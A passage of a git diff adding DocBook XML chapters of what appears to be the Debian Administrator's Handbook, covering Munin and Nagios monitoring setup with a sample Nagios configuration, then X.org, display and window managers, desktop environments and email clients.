+					When invoked without a parameter, the plugin simply returns the last measured values; for instance, executing <command>sudo munin-run load</command> could return <literal>load.value 0.12</literal>.
+				</para>
+				 <para>
+					Finally, when a plugin is invoked with the <literal>autoconf</literal> parameter, it should return “yes” (and a 0 exit status) or “no” (with a 1 exit status) according to whether the plugin should be enabled on this host.
+				</para>
+				 </sidebar>
+			</section>
+			 <section>
+				<title>Configuring the Grapher</title>
+				 <para>
+					The “grapher” is simply the computer that aggregates the data and generates the corresponding graphs. The required software is in the <emphasis role="pkg">munin</emphasis> package. The standard configuration runs <command>munin-cron</command> (once every 5 minutes), which gathers data from all the hosts listed in <filename>/etc/munin/munin.conf</filename> (only the local host is listed by default), saves the historical data in RRD files (<emphasis>Round Robin Database</emphasis>, a file format designed to store data varying in time) stored under <filename>/var/lib/munin/</filename> and generates an HTML page with the graphs in <filename>/var/cache/munin/www/</filename>.
+				</para>
+				 <para>
+					All monitored machines must therefore be listed in the <filename>/etc/munin/munin.conf</filename> configuration file. Each machine is listed as a full section with a name matching the machine and at least an <literal>address</literal> entry giving the corresponding IP address.
+				</para>
+				 
+<programlisting>[ftp.falcot.com]
+    address 192.168.0.12
+    use_node_name yes
+</programlisting>
+				 <para>
+					Sections can be more complex, and describe extra graphs that could be created by combining data coming from several machines. The samples provided in the configuration file are good starting points for customization.
+				</para>
+				 <para>
+					The last step is to publish the generated pages; this involves configuring a web server so that the contents of <filename>/var/cache/munin/www/</filename> are made available on a website. Access to this website will often be restricted, using either an authentication mechanism or IP-based access control. See <xref linkend="sect.http-web-server" /> for the relevant details.
+				</para>
+
+			</section>
+
+		</section>
+		 <section id="sect.nagios">
+			<title>Setting Up Nagios</title>
+			 <indexterm>
+				<primary>Nagios</primary>
+			</indexterm>
+			 <para>
+				Unlike Munin, Nagios does not necessarily require installing anything on the monitored hosts; most of the time, Nagios is used to check the availability of network services. For instance, Nagios can connect to a web server and check that a given web page can be obtained within a given time.
+			</para>
+			 <section>
+				<title>Installing</title>
+				 <para>
+					The first step in setting up Nagios is to install the <emphasis role="pkg">nagios3</emphasis>, <emphasis role="pkg">nagios-plugins</emphasis> and <emphasis role="pkg">nagios3-doc</emphasis> packages. Installing the packages configures the web interface and creates a first <literal>nagiosadmin</literal> user (for which it asks for a password). Adding other users is a simple matter of inserting them in the <filename>/etc/nagios3/htpasswd.users</filename> file with Apache's <command>htpasswd</command> command. If no Debconf question was displayed during installation, <command>dpkg-reconfigure nagios3-cgi</command> can be used to define the <literal>nagiosadmin</literal> password.
+				</para>
+				 <para>
+					Pointing a browser at <literal>http://<replaceable>server</replaceable>/nagios3/</literal> displays the web interface; in particular, note that Nagios already monitors some parameters of the machine where it runs. However, some interactive features such as adding comments to a host do not work. These features are disabled in the default configuration for Nagios, which is very restrictive for security reasons.
+				</para>
+				 <para>
+					As documented in <filename>/usr/share/doc/nagios3/README.Debian</filename>, enabling some features involves editing <filename>/etc/nagios3/nagios.cfg</filename> and setting its <literal>check_external_commands</literal> parameter to “1”. We also need to set up write permissions for the directory used by Nagios, with commands such as the following:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>service nagios3 stop</userinput>
+<computeroutput>[...]
+# </computeroutput><userinput>dpkg-statoverride --update --add nagios www-data 2710 /var/lib/nagios3/rw
+</userinput><computeroutput># </computeroutput><userinput>dpkg-statoverride --update --add nagios nagios 751 /var/lib/nagios3
+</userinput><computeroutput># </computeroutput><userinput>service nagios3 start</userinput>
+<computeroutput>[...]</computeroutput></screen>
+
+			</section>
+			 <section>
+				<title>Configuring</title>
+				 <para>
+					The Nagios web interface is rather nice, but it does not allow configuration, nor can it be used to add monitored hosts and services. The whole configuration is managed via files referenced in the central configuration file, <filename>/etc/nagios3/nagios.cfg</filename>.
+				</para>
+				 <para>
+					These files should not be dived into without some understanding of the Nagios concepts. The configuration lists objects of the following types:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							a <emphasis>host</emphasis> is a machine to be monitored;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							a <emphasis>hostgroup</emphasis> is a set of hosts that should be grouped together for display, or to factor some common configuration elements;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							a <emphasis>service</emphasis> is a testable element related to a host or a host group. It will most often be a check for a network service, but it can also involve checking that some parameters are within an acceptable range (for instance, free disk space or processor load);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							a <emphasis>servicegroup</emphasis> is a set of services that should be grouped together for display;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							a <emphasis>contact</emphasis> is a person who can receive alerts;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							a <emphasis>contactgroup</emphasis> is a set of such contacts;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							a <emphasis>timeperiod</emphasis> is a range of time during which some services have to be checked;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							a <emphasis>command</emphasis> is the command line invoked to check a given service.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					According to its type, each object has a number of properties that can be customized. A full list would be too long to include, but the most important properties are the relations between the objects.
+				</para>
+				 <para>
+					A <emphasis>service</emphasis> uses a <emphasis>command</emphasis> to check the state of a feature on a <emphasis>host</emphasis> (or a <emphasis>hostgroup</emphasis>) within a <emphasis>timeperiod</emphasis>. In case of a problem, Nagios sends an alert to all members of the <emphasis>contactgroup</emphasis> linked to the service. Each member is sent the alert according to the channel described in the matching <emphasis>contact</emphasis> object.
+				</para>
+				 <para>
+					An inheritance system allows easy sharing of a set of properties across many objects without duplicating information. Moreover, the initial configuration includes a number of standard objects; in many cases, defining new hosts, services and contacts is a simple matter of deriving from the provided generic objects. The files in <filename>/etc/nagios3/conf.d/</filename> are a good source of information on how they work.
+				</para>
+				 <para>
+					The Falcot Corp administrators use the following configuration:
+				</para>
+				 <example>
+					<title><filename>/etc/nagios3/conf.d/falcot.cfg</filename> file</title>
+					 
+<programlisting>define contact{
+    name                            generic-contact
+    service_notification_period     24x7
+    host_notification_period        24x7
+    service_notification_options    w,u,c,r
+    host_notification_options       d,u,r
+    service_notification_commands   notify-service-by-email
+    host_notification_commands      notify-host-by-email
+    register                        0 ; Template only
+}
+define contact{
+    use             generic-contact
+    contact_name    rhertzog
+    alias           Raphael Hertzog
+    email           hertzog@debian.org
+}
+define contact{
+    use             generic-contact
+    contact_name    rmas
+    alias           Roland Mas
+    email           lolando@debian.org
+}
+
+define contactgroup{
+    contactgroup_name     falcot-admins
+    alias                 Falcot Administrators
+    members               rhertzog,rmas
+}
+
+define host{
+    use                   generic-host ; Name of host template to use
+    host_name             www-host
+    alias                 www.falcot.com
+    address               192.168.0.5
+    contact_groups        falcot-admins
+    hostgroups            debian-servers,ssh-servers
+}
+define host{
+    use                   generic-host ; Name of host template to use
+    host_name             ftp-host
+    alias                 ftp.falcot.com
+    address               192.168.0.6
+    contact_groups        falcot-admins
+    hostgroups            debian-servers,ssh-servers
+}
+
+# 'check_ftp' command with custom parameters
+define command{
+    command_name          check_ftp2
+    command_line          /usr/lib/nagios/plugins/check_ftp -H $HOSTADDRESS$ -w 20 -c 30 -t 35
+}
+
+# Generic Falcot service
+define service{
+    name                  falcot-service
+    use                   generic-service
+    contact_groups        falcot-admins
+    register              0
+}
+
+# Services to check on www-host
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   HTTP
+    check_command         check_http
+}
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   HTTPS
+    check_command         check_https
+}
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   SMTP
+    check_command         check_smtp
+}
+
+# Services to check on ftp-host
+define service{
+    use                   falcot-service
+    host_name             ftp-host
+    service_description   FTP
+    check_command         check_ftp2
+}
+</programlisting>
+
+				</example>
+				 <para>
+					This configuration file describes two monitored hosts. The first one is the web server, and the checks are made on the HTTP (80) and secure-HTTP (443) ports. Nagios also checks that an SMTP server runs on port 25. The second host is the FTP server, and the check includes making sure that a reply comes within 20 seconds. Beyond this delay, a <emphasis>warning</emphasis> is emitted; beyond 30 seconds, the alert is deemed critical. The Nagios web interface also shows that the SSH service is monitored: this comes from the hosts belonging to the <literal>ssh-servers</literal> hostgroup. The matching standard service is defined in <filename>/etc/nagios3/conf.d/services_nagios2.cfg</filename>.
+				</para>
+				 <para>
+					Note the use of inheritance: an object is made to inherit from another object with the “use <replaceable>parent-name</replaceable>”. The parent object must be identifiable, which requires giving it a “name <replaceable>identifier</replaceable>” property. If the parent object is not meant to be a real object, but only to serve as a parent, giving it a “register 0” property tells Nagios not to consider it, and therefore to ignore the lack of some parameters that would otherwise be required.
+				</para>
+				 <sidebar> <title><emphasis>DOCUMENTATION</emphasis> List of object properties</title>
+				 <para>
+					A more in-depth understanding of the various ways in which Nagios can be configured can be obtained from the documentation provided by the <emphasis role="pkg">nagios3-doc</emphasis> package. This documentation is directly accessible from the web interface, with the “Documentation” link in the top left corner. It includes a list of all object types, with all the properties they can have. It also explains how to create new plugins.
+				</para>
+				 </sidebar> <sidebar> <title><emphasis>GOING FURTHER</emphasis> Remote tests with NRPE</title>
+				 <para>
+					Many Nagios plugins allow checking some parameters local to a host; if many machines need these checks while a central installation gathers them, the NRPE (<emphasis>Nagios Remote Plugin Executor</emphasis>) plugin needs to be deployed. The <emphasis role="pkg">nagios-nrpe-plugin</emphasis> package needs to be installed on the Nagios server, and <emphasis role="pkg">nagios-nrpe-server</emphasis> on the hosts where local tests need to run. The latter gets its configuration from <filename>/etc/nagios/nrpe.cfg</filename>. This file should list the tests that can be started remotely, and the IP addresses of the machines allowed to trigger them. On the Nagios side, enabling these remote tests is a simple matter of adding matching services using the new <emphasis>check_nrpe</emphasis> command.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/13_workstation.xml b/tmp/cs-CZ/xml/13_workstation.xml
new file mode 100644
index 000000000..7bb97e259
--- /dev/null
+++ b/tmp/cs-CZ/xml/13_workstation.xml
@@ -0,0 +1,902 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="workstation" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Workstation</keyword>
+			 <keyword>Graphical desktop</keyword>
+			 <keyword>Office work</keyword>
+			 <keyword>X.org</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Workstation</title>
+	 <highlights> <para>
+		Now that server deployments are done, the administrators can focus on installing the individual workstations and creating a typical configuration.
+	</para>
+	 </highlights> <section id="sect.x11-server-configuration">
+		<title>Configuring the X11 Server</title>
+		 <indexterm>
+			<primary>XFree86</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>X.org</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>X11</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>interface</primary>
+			<secondary>graphical</secondary>
+		</indexterm>
+		 <para>
+			The initial configuration for the graphical interface can be awkward at times; very recent video cards often don't work perfectly with the X.org version shipped in the Debian stable version.
+		</para>
+		 <para>
+			A brief reminder: X.org is the software component that allows graphical applications to display windows on screen. It includes a driver that makes efficient use of the video card. The features offered to the graphical applications are exported through a standard interface, <emphasis>X11</emphasis> (<emphasis role="distribution">Stretch</emphasis> contains version <emphasis>X11R7.7</emphasis>).
+		</para>
+		 <sidebar> <title><emphasis>PERSPECTIVE</emphasis> X11, XFree86 and X.org</title>
+		 <para>
+			X11 is the graphical system most widely used on Unix-like systems (also available for Windows and Mac OS). Strictly speaking, the term “X11” only refers to a protocol specification, but it is also used to refer to the implementation in practice.
+		</para>
+		 <para>
+			X11 had a rough start, but the 1990s saw XFree86 emerge as the reference implementation because it was free software, portable, and maintained by a collaborative community. However, the rate of evolution slowed down near the end when the software only gained new drivers. That situation, along with a very controversial license change, led to the X.org fork in 2004. This is now the reference implementation, and Debian <emphasis role="distribution">Stretch</emphasis> uses X.org version 7.7.
+		</para>
+		 </sidebar> <para>
+			Current versions of X.org are able to autodetect the available hardware: this applies to the video card and the monitor, as well as keyboards and mice; in fact, it is so convenient that the package no longer even creates a <filename>/etc/X11/xorg.conf</filename> configuration file.
+		</para>
+		 <indexterm>
+			<primary>resolution</primary>
+		</indexterm>
+		 <para>
+			The keyboard configuration is currently set up in <filename>/etc/default/keyboard</filename>. This file is used both to configure the text console and the graphical interface, and it is handled by the <emphasis role="pkg">keyboard-configuration</emphasis> package. Details on configuring the keyboard layout are available in <xref linkend="sect.keyboard-config" />.
+		</para>
+		 <para>
+			The <emphasis role="pkg">xserver-xorg-core</emphasis> package provides a generic X server, as used by the 7.x versions of X.org. This server is modular and uses a set of independent drivers to handle the many different kinds of video cards. Installing <emphasis role="pkg">xserver-xorg</emphasis> ensures that both the server and at least one video driver are installed.
+		</para>
+		 <indexterm>
+			<primary>server</primary>
+			<secondary>X</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="pkg">xserver-xorg</emphasis></primary>
+		</indexterm>
+		 <para>
+			Note that if the detected video card is not handled by any of the available drivers, X.org tries using the VESA and fbdev drivers. VESA is a generic driver that should work everywhere, but with limited capabilities (fewer available resolutions, no hardware acceleration for games and visual effects for the desktop, and so on) while fbdev works on top of the kernel's framebuffer device. Nowadays the X server runs without any administrative privileges (this used to be required to be able to configure the screen) and thus its log file is now stored in the user's home directory in <filename>~/.local/share/xorg/Xorg.0.log</filename> (whereas it used to be in <filename>/var/log/Xorg.0.log</filename> for versions older than <emphasis role="distribution">Stretch</emphasis>). That log file is where one would look to know what driver is currently in use. For example, the following snippet matches what the <literal>intel</literal> driver outputs when it is loaded:
+		</para>
+		 
+<programlisting>
+(==) Matched intel as autoconfigured driver 0
+(==) Matched modesetting as autoconfigured driver 1
+(==) Matched vesa as autoconfigured driver 2
+(==) Matched fbdev as autoconfigured driver 3
+(==) Assigned the driver to the xf86ConfigLayout
+(II) LoadModule: "intel"
+(II) Loading /usr/lib/xorg/modules/drivers/intel_drv.so
+</programlisting>
+		 <indexterm>
+			<primary>VESA</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>video card</primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>EXTRA</emphasis> Proprietary drivers</title>
+		 <para>
+			Some video card makers (most notably nVidia) refuse to publish the hardware specifications that would be required to implement good free drivers. They do, however, provide proprietary drivers that allow using their hardware. This policy is nefarious, because even when the provided driver exists, it is usually not as polished as it should be; more importantly, it does not necessarily follow the X.org updates, which may prevent the latest available driver from loading correctly (or at all). We cannot condone this behavior, and we recommend you avoid these makers and favor more cooperative manufacturers.
+		</para>
+		 <para>
+			If you still end up with such a card, you will find the required packages in the <emphasis>non-free</emphasis> section: <emphasis role="pkg">nvidia-driver</emphasis> for nVidia cards. It requires a matching kernel module. Building the module can be automated by installing the package <emphasis role="pkg">nvidia-kernel-dkms</emphasis> (for nVidia).
+		</para>
+		 <para>
+			The “nouveau” project aims to develop a free software driver for nVidia cards and is the default driver that you get for nVidia cards in Debian. As of <emphasis role="distribution">Stretch</emphasis>, its feature set and performance do not match the proprietary driver. In the developers' defense, we should mention that the required information can only be gathered by reverse engineering, which makes things difficult. The free driver for ATI video cards, called “radeon”, is much better in that regard although it often requires non-free firmware.
+		</para>
+		 <indexterm>
+			<primary>ATI</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>nVidia</primary>
+		</indexterm>
+		 </sidebar>
+	</section>
+	 <section id="sect.customizing-graphical-interface">
+		<title>Customizing the Graphical Interface</title>
+		 <section>
+			<title>Choosing a Display Manager</title>
+			 <indexterm>
+				<primary>manager</primary>
+				<secondary>display</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>gdm</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>sddm</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>xdm</command></primary>
+			</indexterm>
+			 <para>
+				The graphical interface only provides display space. Running the X server by itself only leads to an empty screen, which is why most installations use a <emphasis>display manager</emphasis> to display a user authentication screen and start the graphical desktop once the user has authenticated. The three most popular display managers in current use are <emphasis role="pkg">gdm3</emphasis> (<foreignphrase>GNOME Display Manager</foreignphrase>), <emphasis role="pkg">sddm</emphasis> (suggested for KDE Plasma) and <emphasis role="pkg">lightdm</emphasis> (<foreignphrase>Light Display Manager</foreignphrase>). Since the Falcot Corp administrators have opted to use the GNOME desktop environment, they logically picked <command>gdm3</command> as a display manager too. The <filename>/etc/gdm3/daemon.conf</filename> configuration file has many options (the list can be found in the <filename>/usr/share/gdm/gdm.schemas</filename> schema file) to control its behaviour while <filename>/etc/gdm3/greeter.dconf-defaults</filename> contains settings for the greeter “session” (more than just a login window, it is a limited desktop with power management and accessibility related tools). Note that some of the most useful settings for end-users can be tweaked with GNOME's control center.
+			</para>
+
+		</section>
+		 <section>
+			<title>Choosing a Window Manager</title>
+			 <para>
+				Since each graphical desktop provides its own window manager, which window manager you choose is usually influenced by which desktop you have selected. GNOME uses the <command>mutter</command> window manager, Plasma uses <command>kwin</command>, and Xfce (which we present later) has <command>xfwm</command>. The Unix philosophy always allows using one's window manager of choice, but following the recommendations allows an administrator to best take advantage of the integration efforts led by each project.
+			</para>
+			 <indexterm>
+				<primary><command>mutter</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>kwin</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>xfwm</command></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Window manager</title>
+			 <indexterm>
+				<primary>manager</primary>
+				<secondary>window</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis>window manager</emphasis></primary>
+			</indexterm>
+			 <para>
+				The window manager displays the “decorations” around the windows belonging to the currently running applications, which includes frames and the title bar. It also allows reducing, restoring, maximizing, and hiding windows. Most window managers also provide a menu that pops up when the desktop is clicked in a specific way. This menu provides the means to close the window manager session, start new applications, and in some cases, change to another window manager (if installed).
+			</para>
+			 </sidebar> <para>
+				Older computers may, however, have a hard time running heavyweight graphical desktop environments. In these cases, a lighter configuration should be used. “Light” (or small footprint) window managers include WindowMaker (in the <emphasis role="pkg">wmaker</emphasis> package), Afterstep, fvwm, icewm, blackbox, fluxbox, or openbox. In these cases, the system should be configured so that the appropriate window manager gets precedence; the standard way is to change the <command>x-window-manager</command> alternative with the command <command>update-alternatives --config x-window-manager</command>.
+			</para>
+			 <indexterm>
+				<primary>WindowMaker</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Afterstep</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Blackbox</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Icewm</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Fluxbox</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Openbox</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>x-window-manager</command></primary>
+			</indexterm>
+			 <sidebar id="sidebar.alternatives"> <title><emphasis>DEBIAN SPECIFICITY</emphasis> Alternatives</title>
+			 <indexterm>
+				<primary><emphasis>alternative</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>choice</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>update-alternatives</command></primary>
+			</indexterm>
+			 <para>
+				The Debian policy lists a number of standardized commands able to perform a particular action. For example, the <command>x-window-manager</command> command invokes a window manager. But Debian does not assign this command to a fixed window manager. The administrator can choose which manager it should invoke.
+			</para>
+			 <para>
+				For each window manager, the relevant package therefore registers the appropriate command as a possible choice for <command>x-window-manager</command> along with an associated priority. Barring explicit configuration by the administrator, this priority allows picking the best installed window manager when the generic command is run.
+			</para>
+			 <para>
+				Both the registration of commands and the explicit configuration involve the <command>update-alternatives</command> script. Choosing where a symbolic command points at is a simple matter of running <command>update-alternatives --config <replaceable>symbolic-command</replaceable></command>. The <command>update-alternatives</command> script creates (and maintains) symbolic links in the <filename>/etc/alternatives/</filename> directory, which in turn references the location of the executable. As time passes, packages are installed or removed, and/or the administrator makes explicit changes to the configuration. When a package providing an alternative is removed, the alternative automatically goes to the next best choice among the remaining possible commands.
+			</para>
+			 <para>
+				Not all symbolic commands are explicitly listed by the Debian policy; some Debian package maintainers deliberately chose to use this mechanism in less straightforward cases where it still brings interesting flexibility (examples include <command>x-www-browser</command>, <command>www-browser</command>, <command>cc</command>, <command>c++</command>, <command>awk</command>, and so on).
+			</para>
+			 <indexterm>
+				<primary><command>x-www-browser</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>www-browser</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>cc</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>c++</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>awk</command></primary>
+			</indexterm>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Menu Management</title>
+			 <indexterm>
+				<primary><command>menu</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>update-menus</command></primary>
+			</indexterm>
+			 <para>
+				Modern desktop environments and many window managers provide menus listing the available applications for the user. In order to keep menus up-to-date in relation to the actual set of available applications, each package usually provides a <filename>.desktop</filename> file in <filename>/usr/share/applications</filename>. The format of those files has been standardized by FreeDesktop.org: <ulink type="block" url="https://standards.freedesktop.org/desktop-entry-spec/latest/" />
+			</para>
+			 <para>
+				The applications menus can be further customized by administrators through system-wide configuration files as described by the “Desktop Menu Specification”. End-users can also customize the menus with graphical tools such as <emphasis role="pkg">kmenuedit</emphasis> (in Plasma), <emphasis role="pkg">alacarte</emphasis> (in GNOME) or <emphasis role="pkg">menulibre</emphasis>. <ulink type="block" url="https://standards.freedesktop.org/menu-spec/latest/" />
+			</para>
+			 <sidebar> <title><emphasis>HISTORY</emphasis> The Debian menu system</title>
+			 <para>
+				Historically — way before the FreeDesktop.org standards emerged — Debian had invented its own menu system where each package provided a generic description of the desired menu entries in <filename>/usr/share/menu/</filename>. This tool is still available in Debian (in the <emphasis role="pkg">menu</emphasis> package) but it is only marginally useful since package maintainers are encouraged to rely on <filename>.desktop</filename> files instead.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.graphical-desktops">
+		<title>Graphical Desktops</title>
+		 <para>
+			The free graphical desktop field is dominated by two large software collections: GNOME and Plasma by KDE. Both of them are very popular. This is rather a rare instance in the free software world; the Apache web server, for instance, has very few peers.
+		</para>
+		 <indexterm>
+			<primary>graphical desktop</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>GNOME</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>KDE</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>GTK+</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Qt</primary>
+		</indexterm>
+		 <para>
+			This diversity is rooted in history. Plasma (initially only KDE, which is now the name of the community) was the first graphical desktop project, but it chose the Qt graphical toolkit and that choice wasn't acceptable for a large number of developers. Qt was not free software at the time, and GNOME was started based on the GTK+ toolkit. Qt has since become free software, but the projects still evolved in parallel.
+		</para>
+		 <para>
+			The GNOME and KDE communities still work together: under the FreeDesktop.org umbrella, the projects collaborated in defining standards for interoperability across applications.
+		</para>
+		 <indexterm>
+			<primary>FreeDesktop.org</primary>
+		</indexterm>
+		 <para>
+			Choosing “the best” graphical desktop is a sensitive topic which we prefer to steer clear of. We will merely describe the many possibilities and give a few pointers for further thoughts. The best choice will be the one you make after some experimentation.
+		</para>
+		 <section id="sect.gnome-desktop">
+			<title>GNOME</title>
+			 <para>
+				Debian <emphasis role="distribution">Stretch</emphasis> includes GNOME version 3.22, which can be installed by a simple <command>apt install gnome</command> (it can also be installed by selecting the “Debian desktop environment” task).
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">gnome</emphasis></primary>
+			</indexterm>
+			 <para>
+				GNOME is noteworthy for its efforts in usability and accessibility. Design professionals have been involved in writing its standards and recommendations, which has helped developers to create satisfying graphical user interfaces. The project also gets encouragement from the big players of computing, such as Intel, IBM, Oracle, Novell, and of course, various Linux distributions. Finally, many programming languages can be used in developing applications interfacing to GNOME.
+			</para>
+			 <figure>
+				<title>The GNOME desktop</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/gnome.png" format="PNG" scalefit="1" width="70%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				For administrators, GNOME seems to be better prepared for massive deployments. Application configuration is handled through the GSettings interface and stores its data in the DConf database. The configuration settings can thus be queried and edited with the <command>gsettings</command>, and <command>dconf</command> command-line tools, or by the <command>dconf-editor</command> graphical user interfaces. The administrator can therefore change users' configuration with a simple script. The GNOME website provides information to guide administrators who manage GNOME workstations: <ulink type="block" url="https://help.gnome.org/admin/" />
+			</para>
+			 <indexterm>
+				<primary><command>gsettings</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>dconf</command></primary>
+			</indexterm>
+
+		</section>
+		 <section>
+			<title>KDE and Plasma</title>
+			 <para>
+				Debian <emphasis role="distribution">Stretch</emphasis> includes version 5.8 of KDE Plasma, which can be installed with <command>apt install kde-standard</command>.
+			</para>
+			 <para>
+				Plasma has had a rapid evolution based on a very hands-on approach. Its authors quickly got very good results, which allowed them to grow a large user-base. These factors contributed to the overall project quality. Plasma is a mature desktop environment with a wide range of applications.
+			</para>
+			 <figure>
+				<title>The Plasma desktop</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/kde.png" format="PNG" scalefit="1" width="70%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				Since the Qt 4.0 release, the last remaining license problem with KDE software has been solved. This version was released under the GPL both for Linux and Windows (the Windows version was previously released under a non-free license). KDE applications are primarily developed using the C++ language.
+			</para>
+
+		</section>
+		 <section>
+			<title>Xfce and Others</title>
+			 <para>
+				Xfce is a simple and lightweight graphical desktop, which is a perfect match for computers with limited resources. It can be installed with <command>apt install xfce4</command>. Like GNOME, Xfce is based on the GTK+ toolkit, and several components are common across both desktops.
+			</para>
+			 <indexterm>
+				<primary>Xfce</primary>
+			</indexterm>
+			 <para>
+				Unlike GNOME and Plasma, Xfce does not aim to become a vast project. Beyond the basic components of a modern desktop (file manager, window manager, session manager, a panel for application launchers and so on), it only provides a few specific applications: a terminal, a calendar (Orage), an image viewer, a CD/DVD burning tool, a media player (Parole), sound volume control and a text editor (mousepad).
+			</para>
+			 <figure>
+				<title>The Xfce desktop</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/xfce.png" format="PNG" scalefit="1" width="70%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				Another desktop environment provided in <emphasis role="distribution">Stretch</emphasis> is LXDE, which focuses on the “lightweight” aspect. It can be installed with the <emphasis role="pkg">lxde</emphasis> meta-package.
+			</para>
+			 <indexterm>
+				<primary>LXDE</primary>
+			</indexterm>
+
+		</section>
+
+	</section>
+	 <section id="sect.main-desktop-tools">
+		<title>Email</title>
+		 <indexterm>
+			<primary>email</primary>
+			<secondary>software</secondary>
+		</indexterm>
+		 <section>
+			<title>Evolution</title>
+			 <indexterm>
+				<primary>Evolution</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>COMMUNITY</emphasis> <emphasis>Popular</emphasis> packages</title>
+			 <para>
+				Installing the <emphasis role="pkg">popularity-contest</emphasis> package enables participation in an automated survey that informs the Debian project about the most popular packages. A script is run weekly by <command>cron</command> which sends (by HTTP or email) an anonymized list of the installed packages and the latest access date for the files they contain. This allows the Debian maintainers to know which packages are most frequently installed, and of these, how frequently they are actually used.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">popularity-contest</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>popularity of packages</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>popularity</secondary>
+			</indexterm>
+			 <para>
+				This information is a great help to the Debian project. It is used to determine which packages should go on the first installation disks. The installation data is also an important factor used to decide whether to remove a package with very few users from the distribution. We heartily recommend installing the <emphasis role="pkg">popularity-contest</emphasis> package, and participating in the survey.
+			</para>
+			 <para>
+				The collected data are made public every day. <ulink type="block" url="https://popcon.debian.org/" />
+			</para>
+			 <para>
+				These statistics can also help users to choose between two packages that seem otherwise equivalent. Choosing the more popular package is probably a safer choice.
+			</para>
+			 </sidebar> <para>
+				Evolution is the GNOME email client and can be installed with <command>apt install evolution</command>. Evolution is more than a simple email client: it also provides a calendar, an address book, a task list, and a memo (free-form note) application. Its email component includes a powerful message indexing system, and allows for the creation of virtual folders based on search queries on all archived messages. In other words, all messages are stored the same way but displayed in a folder-based organization, each folder containing messages that match a set of filtering criteria.
+			</para>
+			 <figure>
+				<title>The Evolution email software</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/evolution.png" format="PNG" scalefit="1" width="70%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				An extension to Evolution allows integration with a Microsoft Exchange email system; the required package is <emphasis role="pkg">evolution-ews</emphasis>.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">evolution-ews</emphasis></primary>
+			</indexterm>
+
+		</section>
+		 <section>
+			<title>KMail</title>
+			 <indexterm>
+				<primary>KMail</primary>
+			</indexterm>
+			 <para>
+				The KDE email software can be installed with <command>apt install kmail</command>. KMail only handles email, but it belongs to a software suite called KDE-PIM (for <emphasis>Personal Information Manager</emphasis>) that includes features such as address books, a calendar component, and so on. KMail has all the features one would expect from an excellent email client.
+			</para>
+			 <figure>
+				<title>The KMail email software</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/kmail.png" format="PNG" scalefit="1" width="70%" />
+					</imageobject>
